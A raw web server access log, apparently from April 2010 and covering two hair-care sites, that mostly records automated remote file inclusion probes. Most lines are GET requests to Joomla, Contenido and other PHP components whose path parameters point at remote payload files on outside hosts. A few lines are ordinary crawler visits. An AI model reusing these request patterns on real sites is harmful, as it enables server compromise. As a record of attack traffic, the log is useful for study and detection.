76.73.79.11 - - [19/Apr/2010:01:52:58 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:52:59 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:52:59 -0700] "GET /logs/access_100412.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.121 - - [19/Apr/2010:01:53:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13374 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
67.195.112.115 - - [19/Apr/2010:01:54:32 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
76.73.79.11 - - [19/Apr/2010:01:55:23 -0700] "GET /logs/access_100412.log%20%20/////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:55:24 -0700] "GET /logs/////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:55:25 -0700] "GET ////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:56:46 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:57:54 -0700] "GET /logs/access_100412.log%20%20//////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:57:54 -0700] "GET /logs//////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
76.73.79.11 - - [19/Apr/2010:01:57:54 -0700] "GET /////?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.7.34 - - [19/Apr/2010:02:06:49 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.7.34 - - [19/Apr/2010:02:06:49 -0700] "GET /logs/access_100308.log//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.7.34 - - [19/Apr/2010:02:06:49 -0700] "GET /bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:36:47 -0700] "GET /logs/access_100412.log%20%20/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:36:47 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:36:47 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:37:51 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:37:53 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:37:53 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:38:25 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:38:38 -0700] "GET /logs/access_100412.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:38:38 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:39:22 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:39:22 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:39:23 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:01 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:02 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:02 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:13 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:13 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:13 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:27 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:27 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:40:32 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:52 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:52 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:54 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:41:55 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:32 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:32 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:37 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:44 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:44 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:44 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:45 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:45 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:53 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:42:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:43:13 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:43:13 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:43:13 -0700] "GET /logs/access_100412.log%20%20/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:44:46 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:44:59 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:45:43 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:45:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:45:43 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:46:18 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:47:03 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:47:15 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:47:18 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:02:47:38 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:22 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:22 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:36 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:02:48:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [19/Apr/2010:02:51:07 -0700] "GET /logs/access_100412.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.forzasheva.com/gbook/libs/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.80.193.34 - - [19/Apr/2010:02:55:50 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; SIMBAR Enabled; SIMBAR={2C2A8827-6619-49c3-A2EF-78930CFA6EBC}; SIMBAR=0; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
72.46.157.102 - - [19/Apr/2010:03:00:20 -0700] "GET /logs/access_100301.log//twindow_cart.php?shop_this_skin_path=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
72.46.157.102 - - [19/Apr/2010:03:00:20 -0700] "GET /logs//twindow_cart.php?shop_this_skin_path=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
72.46.157.102 - - [19/Apr/2010:03:00:20 -0700] "GET /twindow_cart.php?shop_this_skin_path=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
77.88.25.28 - - [19/Apr/2010:03:03:47 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.67.201.187 - - [19/Apr/2010:03:06:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:33 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:37 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:37 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:54 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:54 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:55 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:56 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:06:58 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:17 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:27 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:27 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:30 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:30 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:30 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:45 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
